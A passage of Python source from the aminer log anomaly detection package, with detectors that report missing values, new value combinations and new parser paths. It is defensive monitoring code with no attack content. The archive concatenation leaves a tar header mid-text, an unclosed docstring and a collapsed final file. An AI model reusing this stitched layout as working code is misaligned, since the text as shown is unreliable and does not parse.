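        @param log_atom the atom passed on to the event handlers when missing values are reported.
        @return True always.
        """
        old_last_seen_timestamp = self.last_seen_timestamp
        self.last_seen_timestamp = max(self.last_seen_timestamp, timestamp)
        if self.last_seen_timestamp > self.next_check_timestamp:
            missing_value_list = []
            # Start with a large recheck interval. It will be lowered if any of the expectation intervals is below that.
            if self.next_check_timestamp == 0:
                self.next_check_timestamp = self.last_seen_timestamp + self.realert_interval
            for value, detector_info in self.expected_values_dict.items():
                value_overdue_time = int(self.last_seen_timestamp - detector_info[0] - detector_info[1])
                if detector_info[2] != 0:
                    next_check_delta = detector_info[2] - self.last_seen_timestamp
                    if next_check_delta > 0:
                        # Already alerted but not ready for realerting yet.
                        self.next_check_timestamp = min(self.next_check_timestamp, detector_info[2])
                        continue
                else:
                    # No alerting yet, see if alerting is required.
                    if value_overdue_time < 0:
                        old = self.next_check_timestamp
                        self.next_check_timestamp = min(self.next_check_timestamp, self.last_seen_timestamp - value_overdue_time)
                        if old > self.next_check_timestamp or self.next_check_timestamp < detector_info[2]:
                            break
                # avoid early re-alerting
                if value_overdue_time > 0:
                    missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]])
                    # Set the next alerting time.
                    detector_info[2] = self.last_seen_timestamp + self.realert_interval
                    self.expected_values_dict[value] = detector_info
                # Workaround:
                # also check for long gaps between same tokens where the last_seen_timestamp gets updated
                # on the arrival of tokens following a longer gap
                elif self.last_seen_timestamp - detector_info[0] > detector_info[1]:
                    value_overdue_time = self.last_seen_timestamp - old_last_seen_timestamp - detector_info[1]
                    missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]])
                    # Set the next alerting time.
                    detector_info[2] = self.last_seen_timestamp + self.realert_interval
                    self.expected_values_dict[value] = detector_info
            if missing_value_list:
                if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
                message_part = []
                affected_log_atom_values = []
                for target_path_list, value, overdue_time, interval in missing_value_list:
                    e = {}
                    # Values originate from log data; undecodable bytes fall back to repr() instead of aborting the report.
                    try:
                        if isinstance(value, list):
                            data = []
                            for val in value:
                                if isinstance(val, bytes):
                                    data.append(val.decode(AminerConfig.ENCODING))
                                else:
                                    data.append(val)
                            data = str(data)
                        else:
                            if isinstance(value, bytes):
                                data = value.decode(AminerConfig.ENCODING)
                            else:
                                data = repr(value)
                    except UnicodeError:
                        data = repr(value)
                    if self.__class__.__name__ == "MissingMatchPathValueDetector":
                        e["TargetPathList"] = target_path_list
                        message_part.append(f" {target_path_list}: {data} overdue {overdue_time}s (interval {interval})\n")
                    else:
                        target_paths = ""
                        for target_path in self.target_path_list:
                            target_paths += target_path + ", "
                        e["TargetPathList"] = self.target_path_list
                        message_part.append(f" {target_paths[:-2]}: {data} overdue {overdue_time}s (interval {interval})\n")
                    e["Value"] = str(value)
                    e["OverdueTime"] = str(overdue_time)
                    e["Interval"] = str(interval)
                    affected_log_atom_values.append(e)
                affected_log_atom_paths = []
                for path in log_atom.parser_match.get_match_dictionary().keys():
                    if path in self.target_path_list:
                        affected_log_atom_paths.append(path)
                analysis_component = {"AffectedLogAtomPaths": affected_log_atom_paths, "AffectedLogAtomValues": affected_log_atom_values}
                event_data = {"AnalysisComponent": analysis_component}
                for listener in self.anomaly_event_handlers:
                    self.send_event_to_handlers(listener, event_data, log_atom, ["".join(message_part).strip()])
        return True

    def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part):
        """Send an event to the event handlers."""
        anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, "Interval too large between values", message_part,
                                            event_data, log_atom, self)

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.
        @param trigger_time the time the timer fired; compared against self.next_persist_time.
        @return the number of seconds until the next timer call.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def load_persistence_data(self):
        """Load the persistence data from storage.
        Records whose target path (index 3) does not belong to the configured target_path_list are skipped; records persisted
        with a different interval are reset to the configured default_interval.
        NOTE(review): the persisted records are indexed without shape checks, so a truncated or hand-edited persistence file
        raises IndexError/TypeError here instead of a descriptive error — confirm whether that is acceptable for the deployment.
        """
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for key in persistence_data:
                value = persistence_data[key]
                # __init__ rejects an empty target_path_list, so the guard below is defensive only. The former
                # "elif self.target_path_list is not None and ..." branch could never be evaluated true and was removed.
                if self.target_path_list is not None:
                    if (value[3] not in self.target_path_list and not self.combine_values) or (
                            value[3] != str(self.target_path_list) and self.combine_values and
                            not isinstance(self, MissingMatchPathListValueDetector)):
                        continue
                if value[1] != self.default_interval:
                    value[1] = self.default_interval
                    value[2] = value[0] + self.default_interval
                self.expected_values_dict[key] = value
        logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, self.expected_values_dict)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.
        @param event_type must equal "Analysis.<ClassName>" of this detector.
        @param event_data [value, target_path] of the tracked record to update.
        @param allowlisting_data integer: the new interval in seconds, -1 to reset to default_interval, any other negative value
               to remove the record (a bool also passes the isinstance check, since bool is a subclass of int).
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != self.analysis_string % self.__class__.__name__:
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(allowlisting_data, int):
            msg = "Allowlisting data has to be an integer with new interval, -1 to reset to defaults, other negative value to remove the" \
                  " entry"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        new_interval = allowlisting_data
        if new_interval == -1:
            new_interval = self.default_interval
        if new_interval < 0:
            # Raises KeyError when the value is not tracked.
            del self.expected_values_dict[event_data[0]]
            logging.getLogger(DEBUG_LOG_NAME).debug("%s removed check value %s.", self.__class__.__name__, str(event_data[0]))
        else:
            self.expected_values_dict[event_data[0]] = [self.last_seen_timestamp, new_interval, 0, event_data[1]]
            # Force check_timeouts() to recompute the recheck schedule on the next atom.
            self.next_check_timestamp = 0
        return f"Updated '{event_data[0]}' in '{event_data[1]}' to new interval {new_interval}."

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.", component_name,
                self.log_success, self.log_total, self.log_learned_values)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes. Following new values"
                " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_values, self.log_new_learned_values)
        # Counters are reset regardless of the statistics level.
        self.log_success = 0
        self.log_total = 0
        self.log_learned_values = 0
        self.log_new_learned_values = []


class MissingMatchPathListValueDetector(MissingMatchPathValueDetector):
    """This detector works similar to the MissingMatchPathValueDetector.

    It only can look up values from a list of paths until one path really exists. It then uses this value as key to detect log
    atoms belonging to the same data stream. This is useful when e.g. due to different log formats, the hostname, servicename or
    any other relevant channel identifier has alternative paths.
    """

    def get_channel_key(self, log_atom):
        """Get the key identifying the channel this log_atom is coming from.
        @return a (target_path, value) pair of plain strings for the first target path present in the match, or None when none
        of the target paths matched.
        """
        for target_path in self.target_path_list:
            match_element = log_atom.parser_match.get_match_dictionary().get(target_path)
            if match_element is None:
                continue
            if isinstance(match_element.match_object, bytes):
                affected_log_atom_values = match_element.match_object.decode(AminerConfig.ENCODING)
            else:
                affected_log_atom_values = match_element.match_object
            return target_path, str(affected_log_atom_values)
        return None

    def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part):
        """Send an event to the event handlers."""
        anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, "Interval too large between values", message_part,
                                            event_data, log_atom, self)
NewMatchIdValueComboDetector.py000066400000000000000000000366461500476301700367700ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This file defines the NewMatchIdValueComboDetector, a detector to extract values from multiple LogAtoms and check if the value
combination was already seen before.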
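class NewMatchIdValueComboDetector(
        AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """Create events when a new value combination for a given list of match data paths is found.

    The values do not have to come from one log atom: atoms are correlated through an id value located under one of the paths in
    id_path_list, and the combination for that id is completed over time. Incomplete combinations live in two generations of
    dictionaries (id_dict_current, id_dict_old) that receive_atom rotates every min_allowed_time_diff seconds, so a partial combo is
    held for at least min_allowed_time_diff and at most 2 * min_allowed_time_diff seconds before it is dropped - or, when
    allow_missing_values_flag is set, evaluated as it is.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, id_path_list, min_allowed_time_diff,
                 persistence_id="Default", allow_missing_values_flag=False, learn_mode=False, output_logline=True,
                 stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param target_path_list the list of values to extract from each match to create the value combination to be checked.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param id_path_list the list of paths where id values can be stored in all relevant log event types.
        @param min_allowed_time_diff the minimum amount of time in seconds after the first appearance of a log atom with a specific id
               that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is
               2*min_allowed_time_diff
        @param persistence_id name of persistence file.
        @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from
               target_path_list does not refer to an existing parsed data object.
        @param learn_mode when set to True, this detector will report a new value only the first time before including it in the
               known values set automatically.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose log atoms receive_atom skips without processing.
        @raises ValueError when target_path_list or id_path_list is None or empty.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            id_path_list=id_path_list, min_allowed_time_diff=min_allowed_time_diff, persistence_id=persistence_id,
            allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline,
            stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time,
            log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]
        )
        if not self.target_path_list:
            msg = "target_path_list must not be None or empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not self.id_path_list:
            msg = "id_path_list must not be None or empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.log_learned_path_value_combos = 0
        self.log_new_learned_values = []
        # Known combinations are plain dicts {target_path: value}; membership tests below are linear in the list length.
        self.known_values = []
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        self.load_persistence_data()
        # Two generations of incomplete combos keyed by id value; receive_atom rotates them every min_allowed_time_diff seconds.
        self.id_dict_current = {}
        self.id_dict_old = {}
        self.next_shift_time = None

    def receive_atom(self, log_atom):
        """Receive on parsed atom and the information about the parser match.

        @param log_atom the parsed log atom.
        @return True if a value combination was extracted and checked against the list of known combinations, no matter if the
                checked values were new or not. False if the atom comes from an ignored resource or carries no id value.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name.decode() == source:
                return False
        self.log_total += 1
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            # The configured stop times are relative; anchor them to the first atom seen.
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        match_dict = log_atom.parser_match.get_match_dictionary()
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        id_match_element = None
        for id_path in self.id_path_list:
            # Get the id value and return if not found in this log atom.
            id_match_element = match_dict.get(id_path)
            if id_match_element is not None:
                break
        if id_match_element is None:
            return False
        timestamp = log_atom.get_timestamp()
        if timestamp is not None:
            if self.next_shift_time is None:
                self.next_shift_time = timestamp + self.min_allowed_time_diff
            if timestamp > self.next_shift_time:
                # Every min_allowed_time_diff seconds, process all combinations from id_dict_old and then override id_dict_old with
                # id_dict_current. This guarantees that incomplete combos are hold for at least min_allowed_time_diff seconds before
                # proceeding.
                self.next_shift_time = timestamp + self.min_allowed_time_diff
                if self.allow_missing_values_flag:
                    for id_old in self.id_dict_old:
                        self.process_id_dict_entry(self.id_dict_old[id_old], log_atom)
                self.id_dict_old = self.id_dict_current
                self.id_dict_current = {}
        # NOTE(review): atoms without a timestamp never trigger the rotation above, so their partial combos stay in memory.
        if isinstance(id_match_element, list):
            # A list of matches for the id path is keyed by the tuple of its match objects.
            id_match_object = tuple(match_element.match_object for match_element in id_match_element)
        else:
            id_match_object = id_match_element.match_object
        # Find dictionary containing id and create ref to old or current dict (side effects)
        if id_match_object in self.id_dict_current:
            id_dict = self.id_dict_current
        elif id_match_object in self.id_dict_old:
            id_dict = self.id_dict_old
        else:
            id_dict = self.id_dict_current
            id_dict[id_match_object] = {}
        combo = id_dict[id_match_object]
        for target_path in self.target_path_list:
            # Append values to the combo.
            match_element = match_dict.get(target_path)
            if match_element is None:
                continue
            if isinstance(match_element, list):
                values = []
                for list_element in match_element:
                    if isinstance(list_element.match_object, bytes):
                        values.append(list_element.match_object.decode(AminerConfig.ENCODING))
                    else:
                        # Fix: the non-bytes element itself is appended. Previously the (possibly absent) combo entry for
                        # target_path was appended instead, which raised KeyError on the first occurrence.
                        values.append(list_element.match_object)
                combo[target_path] = values
            elif isinstance(match_element.match_object, bytes):
                combo[target_path] = match_element.match_object.decode(AminerConfig.ENCODING)
            else:
                combo[target_path] = match_element.match_object
        if len(combo) == len(self.target_path_list):
            # Found value for all target paths. No need to wait more.
            self.process_id_dict_entry(combo, log_atom)
            del id_dict[id_match_object]
        self.log_success += 1
        return True

    def process_id_dict_entry(self, id_dict_entry, log_atom):
        """Check one (complete, or with allow_missing_values_flag partial) combo against known_values and report it if unknown.

        In learn_mode the combo is appended to known_values and the stop-learning deadline is pushed out by
        stop_learning_no_anomaly_time.

        @param id_dict_entry dict {target_path: value} collected for one id value.
        @param log_atom the atom that completed the combo (or triggered the rotation), used for the event output.
        """
        if id_dict_entry not in self.known_values:
            # Combo is unknown, process and raise anomaly
            if self.learn_mode:
                self.known_values.append(id_dict_entry)
                self.log_learned_path_value_combos += 1
                self.log_new_learned_values.append(id_dict_entry)
                if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                    self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
            analysis_component = {"AffectedLogAtomValues": [str(i) for i in list(id_dict_entry.values())]}
            event_data = {"AnalysisComponent": analysis_component}
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                data = repr(log_atom.raw_data)
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            if self.output_logline:
                sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + repr(
                    id_dict_entry) + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [repr(id_dict_entry)]
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value combination(s) detected", sorted_log_lines,
                                       event_data, log_atom, self)

    def do_timer(self, trigger_time):
        """Check if current ruleset should be persisted.

        @param trigger_time the current time as seen by the timer.
        @return seconds until the next call is wanted: the configured persistence period, or the remaining time of the current one.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage."""
        PersistenceUtil.store_json(self.persistence_file_name, self.known_values)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """Load the persistence data from storage and register this component for periodic persisting."""
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # Combinations are stored as list of dictionaries
            for record in persistence_data:
                self.known_values.append(record)
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)
        PersistenceUtil.add_persistable_component(self)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must be "Analysis.<class name>" of this detector.
        @param event_data dict {target_path: value} covering exactly the paths of target_path_list, with no bytes values.
        @param allowlisting_data not supported, must be None.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        @throws TypeError when event_data has the wrong shape.
        """
        if event_type != f"Analysis.{self.__class__.__name__}":
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(event_data, dict) or len(event_data) != len(self.target_path_list) or \
                not all(x in self.target_path_list for x in event_data.keys()) or \
                not all(not isinstance(x, bytes) for x in event_data.values()):
            msg = "event_data has to be of type dict and the values should not be bytes."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if not self.allow_missing_values_flag and None in event_data.values():
            msg = "event_data must not have None values if allow_missing_values_flag is False."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if event_data not in self.known_values:
            self.known_values.append(event_data)
        return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data}."

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        The counters are reset after logging.

        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_path_value_combos)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new value combinations in the last 60 minutes. Following"
                " new value combinations were learned: %s", component_name, self.log_success, self.log_total,
                self.log_learned_path_value_combos, self.log_new_learned_values)
        self.log_success = 0
        self.log_total = 0
        self.log_learned_path_value_combos = 0
        self.log_new_learned_values = []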
class NewMatchPathDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """Emit an event whenever a parsed atom contains a parser path that has not been seen before.

    Known paths are kept in known_path_set and written to persistence as a sorted JSON list.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, persistence_id="Default", learn_mode=False, output_logline=True,
                 stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param learn_mode specifies whether new values should be learned.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list resource names whose log atoms receive_atom skips without processing.
        """
        # Predeclare the attributes that the base initializer fills in, so they are visibly defined in this class.
        self.learn_mode = None
        self.stop_learning_time = None
        self.next_persist_time = None
        self.log_success = None
        self.log_total = None
        self.stop_learning_time_initialized = None
        super().__init__(
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id,
            learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list,
            mutable_default_args=["log_resource_ignore_list"]
        )
        self.log_learned_paths = 0
        self.log_new_learned_paths = []
        self.known_path_set = set()
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def receive_atom(self, log_atom):
        """Compare the parser paths of one atom against known_path_set and report the unknown ones.

        @param log_atom the parsed log atom
        @return False when the atom comes from a resource in log_resource_ignore_list, True otherwise. Depending on this
                information, the caller may decide if it makes sense passing the parsed atom also to other handlers.
        """
        if self.log_resource_ignore_list and log_atom.source.resource_name.decode() in self.log_resource_ignore_list:
            return False
        self.log_total += 1
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            # Stop times are configured relative to the first atom; make them absolute here.
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        learning_expired = self.learn_mode is True and self.stop_learning_time is not None and \
            self.stop_learning_time < log_atom.atom_time
        if learning_expired:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        new_paths = []
        for parser_path in log_atom.parser_match.get_match_dictionary().keys():
            if parser_path in self.known_path_set:
                continue
            new_paths.append(parser_path)
            if not self.learn_mode:
                continue
            self.known_path_set.add(parser_path)
            self.log_learned_paths += 1
            self.log_new_learned_paths.append(parser_path)
            if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time)
        if new_paths:
            self._report_new_paths(new_paths, log_atom)
        self.log_success += 1
        return True

    def _report_new_paths(self, new_paths, log_atom):
        """Build the event payload for the unknown paths and hand it to every anomaly event handler."""
        original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
        try:
            data = log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            data = repr(log_atom.raw_data)
        if self.output_logline:
            annotated = log_atom.parser_match.match_element.annotate_match("")
            sorted_log_lines = [annotated + os.linesep + repr(new_paths) + os.linesep + original_log_line_prefix + data]
        else:
            sorted_log_lines = [repr(new_paths)]
        event_data = {"AnalysisComponent": {"AffectedLogAtomPaths": list(new_paths)}}
        event_type = f"Analysis.{self.__class__.__name__}"
        for handler in self.anomaly_event_handlers:
            handler.receive_event(event_type, "New path(s) detected", sorted_log_lines, event_data, log_atom, self)

    def do_timer(self, trigger_time):
        """Persist the known paths when the persistence period has elapsed.

        @param trigger_time the current time as seen by the timer.
        @return seconds until the next call is wanted.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        remaining = self.next_persist_time - trigger_time
        if remaining > 0:
            return remaining
        self.do_persist()
        period = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        self.next_persist_time = trigger_time + period
        return period

    def do_persist(self):
        """Write the known paths to storage as a sorted list."""
        PersistenceUtil.store_json(self.persistence_file_name, sorted(list(self.known_path_set)))
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def load_persistence_data(self):
        """Replace known_path_set with the persisted paths, if a persistence file exists."""
        persisted = PersistenceUtil.load_json(self.persistence_file_name)
        if persisted is None:
            return
        self.known_path_set = set(persisted)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must be "Analysis.<class name>" of this detector.
        @param event_data the parser path (str) to add to the known paths.
        @param allowlisting_data not supported, must be None.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        @throws TypeError when event_data is not a string.
        """
        expected_type = f"Analysis.{self.__class__.__name__}"
        if event_type != expected_type:
            msg = "Event not from this source"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = "Allowlisting data not understood by this detector"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(event_data, str):
            msg = "event_data has to be of type string."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        self.known_path_set.add(event_data)
        return f"Allowlisted path(s) {event_data} in {event_type}."

    def log_statistics(self, component_name):
        """Log statistics of an AtomHandler and reset the counters afterwards.

        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_paths)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %d new paths in the last 60 minutes. Following new paths"
                " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_paths,
                self.log_new_learned_paths)
        self.log_success = 0
        self.log_total = 0
        self.log_learned_paths = 0
        self.log_new_learned_paths = []
""" import os import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class NewMatchPathValueComboDetector( AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when a new value combination for a given list of match data paths were found.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", allow_missing_values_flag=False, learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. 
@param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) self.known_values_set = set() self.load_persistence_data() PersistenceUtil.add_persistable_component(self) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Set and tuples were stored as list of lists. Transform the inner lists to tuples to 